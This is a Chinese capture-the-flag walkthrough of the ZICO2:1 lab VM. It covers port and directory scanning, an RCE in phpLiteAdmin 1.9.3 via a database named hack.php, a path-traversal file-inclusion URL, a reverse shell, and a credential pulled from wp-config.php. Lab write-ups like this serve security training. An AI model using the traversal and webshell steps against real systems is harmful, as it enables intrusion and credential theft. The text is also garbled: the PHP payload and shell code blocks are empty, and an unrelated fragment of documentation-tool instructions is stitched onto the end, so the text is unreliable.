# ZICO2:1 > 下载地址: ## 实战演练 找到靶场IP:`192.168.32.154` ![image-20220612140025154](/files/Slvrj5P1sGOKhxY74k9P) 扫描对外端口 ``` ┌──(root💀kali)-[~/Desktop] └─# nmap -sT -sV -p1-65535 192.168.32.154 Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-12 02:00 EDT Nmap scan report for 192.168.32.154 Host is up (0.00032s latency). Not shown: 65531 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.2.22 ((Ubuntu)) 111/tcp open rpcbind 2-4 (RPC #100000) 41224/tcp open status 1 (RPC #100024) MAC Address: 00:0C:29:BA:E4:65 (VMware) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 14.86 seconds ``` 浏览器访问 ![image-20220612140247686](/files/KDrjHDunarsCbPGssrh3) 获取WEB系统的信息,找到`dbadmin`目录 ``` ┌──(root💀kali)-[~/Desktop] └─# dirb http://192.168.32.154/ ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Sun Jun 12 02:03:31 2022 URL_BASE: http://192.168.32.154/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.32.154/ ---- + http://192.168.32.154/cgi-bin/ (CODE:403|SIZE:290) ==> DIRECTORY: http://192.168.32.154/css/ ==> DIRECTORY: http://192.168.32.154/dbadmin/ ==> DIRECTORY: http://192.168.32.154/img/ + http://192.168.32.154/index (CODE:200|SIZE:7970) + http://192.168.32.154/index.html (CODE:200|SIZE:7970) ==> DIRECTORY: http://192.168.32.154/js/ + http://192.168.32.154/LICENSE (CODE:200|SIZE:1094) + http://192.168.32.154/package (CODE:200|SIZE:789) + http://192.168.32.154/server-status (CODE:403|SIZE:295) + http://192.168.32.154/tools (CODE:200|SIZE:8355) ==> DIRECTORY: http://192.168.32.154/vendor/ + http://192.168.32.154/view (CODE:200|SIZE:0) ---- Entering directory: http://192.168.32.154/css/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.32.154/dbadmin/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.32.154/img/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.32.154/js/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.32.154/vendor/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ----------------- END_TIME: Sun Jun 12 02:03:35 2022 DOWNLOADED: 4612 - FOUND: 8 ``` ``` ┌──(root💀kali)-[~/Desktop] └─# nikto -host http://192.168.32.154/ - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.32.154 + Target Hostname: 192.168.32.154 + Target Port: 80 + Start Time: 2022-06-12 02:03:42 (GMT-4) --------------------------------------------------------------------------- + Server: Apache/2.2.22 (Ubuntu) + Server may leak inodes via ETags, header found with file /, inode: 3803593, size: 7970, mtime: Thu Jun 8 15:18:30 2017 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. + Uncommon header 'tcn' found, with contents: list + Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS + OSVDB-3268: /css/: Directory indexing found. + OSVDB-3092: /css/: This might be interesting... + OSVDB-3268: /img/: Directory indexing found. + OSVDB-3092: /img/: This might be interesting... + OSVDB-3233: /icons/README: Apache default file found. + Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.26 + /package.json: Node.js package file found. It may contain sensitive information. + 8725 requests: 0 error(s) and 15 item(s) reported on remote host + End Time: 2022-06-12 02:03:59 (GMT-4) (17 seconds) --------------------------------------------------------------------------- + 1 host(s) tested ``` ![image-20220612140747155](/files/aRvFguDnLNg5gA1lgluG) phpLiteAdmin v1.9.3存在RCE漏洞 ![image-20220612141113220](/files/qn7xDZsJb2xGYCcyvBUM) 使用`admin`密码进行登录 ![image-20220612141149351](/files/17kSTsTZZuA7w1H0NUbd) 创建数据库,名字叫`hack.php` ![image-20220612141611533](/files/M6zoksC27nGWaEo8RAMz) 创建一个表,里面内容填写``,其中`hack.php`在`/usr/databases/`文件夹内 ![image-20220612142038461](/files/NHWiIX8PjTqqziVOwF5v) 主站有文件包含漏洞 ![image-20220612142234405](/files/jWLDPg7oi3QNT5slMyTr) 这样可以文件包含`hack.php`。 ``` http://192.168.32.154/view.php?page=../../../../../../../../usr/databases/hack.php ``` ![image-20220612142109944](/files/NksdcVFyJuQUOucnTRnw) 接下来要进行反弹shell,先把这个表的内容清空,在添加以下反弹shell代码 ![image-20220612142425540](/files/qzbiJqrqMYnK169Cnbjk) ``` ``` ![image-20220612142514382](/files/KAba1MZtOGkjaxYDkU50) 反弹成功 ![image-20220612142537243](/files/sHe1HqEtq4nrGSWAYMDW) 在`/home/zico/wordpress`目录找到`wp-config.php`配置文件,找到一个账号密码:`zico/sWfCsfJSPV9H3AmQzw8` ``` $ cat wordpress/wp-config.php ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.